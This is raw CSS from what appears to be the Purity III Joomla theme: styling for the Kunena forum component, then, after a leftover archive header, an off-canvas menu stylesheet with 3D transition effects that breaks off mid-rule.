#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #800000;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #800000;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #800000;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #cc0000;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 40px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 20px;
    padding-right: 20px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #cc0000;
  color: #cc0000;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #cc0000;
  border: 1px solid #cc0000;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  display: table;
  content: " ";
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  display: table;
  content: " ";
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .wysibb-toolbar {
  min-height: 34px;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #cc0000;
  color: #cc0000;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #cc0000;
  border-color: #cc0000;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  display: table;
  content: " ";
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  filter: alpha(opacity=40);
  opacity: 0.4;
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}
.view-topic body.modal-open {
  overflow: auto;
}
.com_kunena #t3-mainnav {
  padding: 0;
}
.com_kunena #t3-mainnav .t3-navbar {
  display: inline-block;
  flex: 1;
}
.com_kunena .t3-megamenu .navbar-nav {
  flex-direction: row;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-menu {
  position: absolute;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-toggle::after {
  display: none;
}
.com_kunena .tab-pane.show {
  opacity: 1;
}PKӜ�\�dBt3O3O+purity_iii/css/themes/orange/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #ff8800;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #b35f00;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
